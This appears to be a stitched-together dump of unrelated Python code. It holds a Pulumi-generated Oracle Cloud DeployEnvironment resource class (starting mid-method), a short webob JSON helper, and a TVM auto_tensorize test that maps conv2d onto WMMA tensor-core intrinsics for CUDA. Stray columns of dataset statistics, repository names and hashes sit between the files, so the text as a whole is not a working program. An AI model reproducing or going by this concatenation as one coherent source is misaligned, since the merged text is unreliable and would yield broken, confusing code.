pulumi.set(__self__, "project_id", project_id)
if state is not None:
pulumi.set(__self__, "state", state)
if system_tags is not None:
pulumi.set(__self__, "system_tags", system_tags)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Kubernetes cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="computeInstanceGroupSelectors")
def compute_instance_group_selectors(self) -> Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]:
"""
(Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
"""
return pulumi.get(self, "compute_instance_group_selectors")
@compute_instance_group_selectors.setter
def compute_instance_group_selectors(self, value: Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]):
pulumi.set(self, "compute_instance_group_selectors", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="deployEnvironmentType")
def deploy_environment_type(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment environment type.
"""
return pulumi.get(self, "deploy_environment_type")
@deploy_environment_type.setter
def deploy_environment_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deploy_environment_type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional description about the deployment environment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment environment display name. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="functionId")
def function_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Function.
"""
return pulumi.get(self, "function_id")
@function_id.setter
def function_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function_id", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a project.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current state of the deployment environment.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
"""
return pulumi.get(self, "system_tags")
@system_tags.setter
def system_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "system_tags", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
Time the deployment environment was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
Time the deployment environment was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
class DeployEnvironment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_environment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource provides the Deploy Environment resource in Oracle Cloud Infrastructure Devops service.
Creates a new deployment environment.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_deploy_environment = oci.devops.DeployEnvironment("testDeployEnvironment",
deploy_environment_type=var["deploy_environment_deploy_environment_type"],
project_id=oci_devops_project["test_project"]["id"],
cluster_id=oci_containerengine_cluster["test_cluster"]["id"],
compute_instance_group_selectors=oci.devops.DeployEnvironmentComputeInstanceGroupSelectorsArgs(
items=[oci.devops.DeployEnvironmentComputeInstanceGroupSelectorsItemArgs(
selector_type=var["deploy_environment_compute_instance_group_selectors_items_selector_type"],
compute_instance_ids=var["deploy_environment_compute_instance_group_selectors_items_compute_instance_ids"],
query=var["deploy_environment_compute_instance_group_selectors_items_query"],
region=var["deploy_environment_compute_instance_group_selectors_items_region"],
)],
),
defined_tags={
"foo-namespace.bar-key": "value",
},
description=var["deploy_environment_description"],
display_name=var["deploy_environment_display_name"],
freeform_tags={
"bar-key": "value",
},
function_id=oci_functions_function["test_function"]["id"])
```
## Import
DeployEnvironments can be imported using the `id`, e.g.
```sh
$ pulumi import oci:devops/deployEnvironment:DeployEnvironment test_deploy_environment "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_id: (Updatable) The OCID of the Kubernetes cluster.
:param pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']] compute_instance_group_selectors: (Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_environment_type: (Updatable) Deployment environment type.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment environment.
:param pulumi.Input[str] display_name: (Updatable) Deployment environment display name. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_id: (Updatable) The OCID of the Function.
:param pulumi.Input[str] project_id: The OCID of a project.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DeployEnvironmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Deploy Environment resource in Oracle Cloud Infrastructure Devops service.
Creates a new deployment environment.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_deploy_environment = oci.devops.DeployEnvironment("testDeployEnvironment",
deploy_environment_type=var["deploy_environment_deploy_environment_type"],
project_id=oci_devops_project["test_project"]["id"],
cluster_id=oci_containerengine_cluster["test_cluster"]["id"],
compute_instance_group_selectors=oci.devops.DeployEnvironmentComputeInstanceGroupSelectorsArgs(
items=[oci.devops.DeployEnvironmentComputeInstanceGroupSelectorsItemArgs(
selector_type=var["deploy_environment_compute_instance_group_selectors_items_selector_type"],
compute_instance_ids=var["deploy_environment_compute_instance_group_selectors_items_compute_instance_ids"],
query=var["deploy_environment_compute_instance_group_selectors_items_query"],
region=var["deploy_environment_compute_instance_group_selectors_items_region"],
)],
),
defined_tags={
"foo-namespace.bar-key": "value",
},
description=var["deploy_environment_description"],
display_name=var["deploy_environment_display_name"],
freeform_tags={
"bar-key": "value",
},
function_id=oci_functions_function["test_function"]["id"])
```
## Import
DeployEnvironments can be imported using the `id`, e.g.
```sh
$ pulumi import oci:devops/deployEnvironment:DeployEnvironment test_deploy_environment "id"
```
:param str resource_name: The name of the resource.
:param DeployEnvironmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DeployEnvironmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_environment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DeployEnvironmentArgs.__new__(DeployEnvironmentArgs)
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["compute_instance_group_selectors"] = compute_instance_group_selectors
__props__.__dict__["defined_tags"] = defined_tags
if deploy_environment_type is None and not opts.urn:
raise TypeError("Missing required property 'deploy_environment_type'")
__props__.__dict__["deploy_environment_type"] = deploy_environment_type
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["function_id"] = function_id
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
__props__.__dict__["compartment_id"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["state"] = None
__props__.__dict__["system_tags"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
super(DeployEnvironment, __self__).__init__(
'oci:devops/deployEnvironment:DeployEnvironment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_environment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None) -> 'DeployEnvironment':
"""
Get an existing DeployEnvironment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_id: (Updatable) The OCID of the Kubernetes cluster.
:param pulumi.Input[str] compartment_id: The OCID of a compartment.
:param pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']] compute_instance_group_selectors: (Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_environment_type: (Updatable) Deployment environment type.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment environment.
:param pulumi.Input[str] display_name: (Updatable) Deployment environment display name. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_id: (Updatable) The OCID of the Function.
:param pulumi.Input[str] lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
:param pulumi.Input[str] project_id: The OCID of a project.
:param pulumi.Input[str] state: The current state of the deployment environment.
:param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
:param pulumi.Input[str] time_created: Time the deployment environment was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
:param pulumi.Input[str] time_updated: Time the deployment environment was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DeployEnvironmentState.__new__(_DeployEnvironmentState)
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["compute_instance_group_selectors"] = compute_instance_group_selectors
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["deploy_environment_type"] = deploy_environment_type
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["function_id"] = function_id
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["project_id"] = project_id
__props__.__dict__["state"] = state
__props__.__dict__["system_tags"] = system_tags
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
return DeployEnvironment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of the Kubernetes cluster.
"""
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="computeInstanceGroupSelectors")
def compute_instance_group_selectors(self) -> pulumi.Output['outputs.DeployEnvironmentComputeInstanceGroupSelectors']:
"""
(Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
"""
return pulumi.get(self, "compute_instance_group_selectors")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="deployEnvironmentType")
def deploy_environment_type(self) -> pulumi.Output[str]:
"""
(Updatable) Deployment environment type.
"""
return pulumi.get(self, "deploy_environment_type")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
(Updatable) Optional description about the deployment environment.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) Deployment environment display name. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="functionId")
def function_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of the Function.
"""
return pulumi.get(self, "function_id")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The OCID of a project.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the deployment environment.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
"""
return pulumi.get(self, "system_tags")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
Time the deployment environment was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
Time the deployment environment was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_updated")
| 51.436693
| 324
| 0.678313
| 4,515
| 39,812
| 5.74928
| 0.056257
| 0.066531
| 0.059327
| 0.057632
| 0.91074
| 0.89117
| 0.884968
| 0.876416
| 0.864897
| 0.8241
| 0
| 0.002078
| 0.214257
| 39,812
| 773
| 325
| 51.503234
| 0.827728
| 0.396991
| 0
| 0.709906
| 1
| 0
| 0.133542
| 0.05635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.165094
| false
| 0.002358
| 0.016509
| 0
| 0.283019
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4b2117a6cf0508de99d82b77a4bc6e2f844c791a
| 137
|
py
|
Python
|
m/utils.py
|
comynli/m
|
245f4091f0e1bddc4cff26ad89df03122987d549
|
[
"Apache-2.0"
] | 11
|
2016-09-25T01:35:09.000Z
|
2020-12-30T03:14:35.000Z
|
mini-SQLAlchemy/utils.py
|
EscapeLife/mini-SQLAlchemy
|
c5e4d08349c6469884c5668f4c9dc86cd631b257
|
[
"Apache-2.0"
] | null | null | null |
mini-SQLAlchemy/utils.py
|
EscapeLife/mini-SQLAlchemy
|
c5e4d08349c6469884c5668f4c9dc86cd631b257
|
[
"Apache-2.0"
] | 21
|
2016-09-24T09:56:31.000Z
|
2020-02-18T05:57:21.000Z
|
import json
from webob import Response
def jsonify(**kwargs):
return Response(json.dumps(kwargs), content_type='application/json')
| 19.571429
| 72
| 0.766423
| 18
| 137
| 5.777778
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124088
| 137
| 6
| 73
| 22.833333
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0.116788
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d9b3375057cc74b08759f018c6878f2a94060fd0
| 52,384
|
py
|
Python
|
tests/python/auto_tensorize/test_auto_schedule.py
|
QinHan-Erin/AMOS
|
634bf48edf4015e4a69a8c32d49b96bce2b5f16f
|
[
"Apache-2.0"
] | 22
|
2022-03-18T07:29:31.000Z
|
2022-03-23T14:54:32.000Z
|
tests/python/auto_tensorize/test_auto_schedule.py
|
QinHan-Erin/AMOS
|
634bf48edf4015e4a69a8c32d49b96bce2b5f16f
|
[
"Apache-2.0"
] | null | null | null |
tests/python/auto_tensorize/test_auto_schedule.py
|
QinHan-Erin/AMOS
|
634bf48edf4015e4a69a8c32d49b96bce2b5f16f
|
[
"Apache-2.0"
] | 2
|
2022-03-18T08:26:34.000Z
|
2022-03-20T06:02:48.000Z
|
import tvm
import os
import time
import tempfile
import shutil
import numpy as np
from tvm import testing
from tvm import auto_tensorize as at
from tvm.contrib import tar, ndk
from tvm import auto_scheduler
from tvm.ir import transform
from tvm.driver import build_module
from tvm.runtime import Object, module, ndarray
import multiprocessing as multi
from pebble import concurrent
from concurrent.futures import TimeoutError
from pebble import ProcessPool, ProcessExpired
from tvm import tg
from collections import OrderedDict
TEST_CASES = OrderedDict()
def register_test(func):
name = func.__name__
prefix = "test"
assert name[:len(prefix)] == prefix
try:
number = int(name[len(prefix):])
def _inner(*args, **kwargs):
print(func.__doc__)
func(*args, **kwargs)
assert number not in TEST_CASES, "Repeated test case number %d" % number
TEST_CASES[number] = _inner
except ValueError as e:
print(e)
print("Can't convert to number", name[len(prefix):])
def conv2d(N, C, H, W, K, R, S, stride, padding, with_bias=True, in_dtype=["float16", "float16"], out_dtype="float32"):
H = H + 2 * padding
W = W + 2 * padding
A = tvm.te.placeholder([N, C, H, W], dtype=in_dtype[0], name="A")
B = tvm.te.placeholder([K, C, R, S], dtype=in_dtype[1], name="B")
rc = tvm.te.reduce_axis([0, C], name="rc")
rr = tvm.te.reduce_axis([0, R], name="rr")
rs = tvm.te.reduce_axis([0, S], name="rs")
P = (H - R) // stride + 1
Q = (W - S) // stride + 1
if in_dtype[0] == "uint8":
Conv = tvm.te.compute(
[N, K, P, Q],
lambda n, k, p, q:
tvm.te.sum((A[n, rc, p+rr, q+rs].astype(out_dtype) * B[k, rc, rr, rs].astype(out_dtype)
), axis=[rc, rr, rs]),
name="Conv"
)
else:
Conv = tvm.te.compute(
[N, K, P, Q],
lambda n, k, p, q:
tvm.te.sum((A[n, rc, p+rr, q+rs] * B[k, rc, rr, rs]
).astype(out_dtype), axis=[rc, rr, rs]),
name="Conv"
)
if not with_bias:
return [A, B, Conv]
bias = tvm.te.placeholder([N, K, P, Q], dtype=out_dtype, name="bias")
E = tvm.te.compute(
[N, K, P, Q],
lambda bn, bk, bp, bq: Conv[bn, bk, bp, bq] + bias[bn, bk, bp, bq],
name="E"
)
return [A, B, bias, E]
def get_np_arrays(tensors):
ret = []
for t in tensors:
np_ary = np.random.uniform(-1, 1, [int(x)
for x in t.shape]).astype(t.dtype)
ret.append(np_ary)
return ret
def get_tvm_arrays_from_np_arrays(arys, ctx):
ret = []
for ary in arys:
tvm_ary = tvm.nd.array(ary, ctx)
ret.append(tvm_ary)
return ret
def get_tvm_arrays(tensors, ctx):
ret = []
for t in tensors:
np_ary = np.random.uniform(-1, 1, [int(x)
for x in t.shape]).astype(t.dtype)
tvm_ary = tvm.nd.array(np_ary, ctx)
ret.append(tvm_ary)
return ret
@register_test
def test1():
print("##########################")
print("Test 1")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "8x32x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, bias, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1)
target_dag = at.compute_dag_from_tensors([E])
inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
func_ref = tvm.build(sch_ref, inputs_ref +
list(target_dag.tensors), "llvm")
ctx = tvm.cpu()
inputs_np_arrays = get_np_arrays(inputs_ref)
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
for i in range(1):
record = gen.get()
record.vmap_choice = ([1, 0, 0, 0, 0, 0, 1], record.vmap_choice[1])
print(record.to_json())
app = at.MappingApplier(match_result)
new_state = app.apply(record)
# print("Compare new state and old state:")
# print("new axis map:", new_state.axis_map)
# tmp = []
# for k, v in new_state.axis_map.items():
# tmp.append(v)
# for tri in zip(*tmp):
# print(tri)
# print("new main op map:", new_state.main_op_map)
# new_target_dag = new_state.target_dag
# print("org dag len:", len(new_target_dag.op_lst))
# new_target_main_op = None
# for k, v in new_state.main_op_map.items():
# new_target_main_op = v
# assert new_target_main_op is not None
# new_target_dag, _ = at.reconstruct_dag_as_intrin(
# new_target_dag, new_target_main_op, hw_abs_dag, compute_key, shape_key)
# print("new dag len:", len(new_target_dag.op_lst))
# print("new dag load A op:",
# new_target_dag.op_lst[2].axis, new_target_dag.op_lst[2].body)
# print("new dag load B op:",
# new_target_dag.op_lst[5].axis, new_target_dag.op_lst[5].body)
# print("new dag main op:",
# new_target_dag.op_lst[6].axis, new_target_dag.op_lst[6].body)
# print("new dag store op:",
# new_target_dag.op_lst[7].axis, new_target_dag.op_lst[7].body)
schedule_gen = at.CUDAScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplier(match_result, sc_info)
params = schedule_gen.get()
my_params = {
'vectorize': (1, 1),
'spatial_factors': [([1, 1, 1], (0, 0)), ([4, 1, 1], (-1, 1)), ([14, 1, 1], (-1, -1))],
'reduce_factors': [([3, 3, 4], (1, 1)), ([1, 1, 3], (0, -1))],
'last_factors': [([-1, 32], (-1,))],
'output_unroll_step': (64, -1),
'last_unroll_step': (512, 1)}
params.from_json(my_params)
print(params.to_json())
new_target_dag = sc_info.target_dag
new_inputs = new_target_dag.get_inputs()
sch = tvm.te.create_schedule([x.op for x in new_target_dag.tensors])
# print(tvm.lower(
# sch, new_inputs + list(new_target_dag.tensors), simple_mode=True), flush=True)
# print("new dag len:", len(new_target_dag.op_lst))
# print("new dag load A op:",
# new_target_dag.op_lst[2].axis, new_target_dag.op_lst[2].body)
# print("new dag load B op:",
# new_target_dag.op_lst[5].axis, new_target_dag.op_lst[5].body)
# print("new dag main op:",
# new_target_dag.op_lst[6].axis, new_target_dag.op_lst[6].body)
# print("new dag store op:",
# new_target_dag.op_lst[7].axis, new_target_dag.op_lst[7].body)
schedule_app.apply(sch, params)
# print(tvm.lower(
# sch, new_inputs + list(new_target_dag.tensors), simple_mode=True), flush=True)
func = tvm.build(sch, new_inputs +
list(new_target_dag.tensors), "cuda")
# print(func.imported_modules[0].get_source())
# print(new_target_dag.tensors)
ctx = tvm.gpu()
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays = get_tvm_arrays(list(new_target_dag.tensors), ctx)
func(*inputs_arrays, *outputs_arrays)
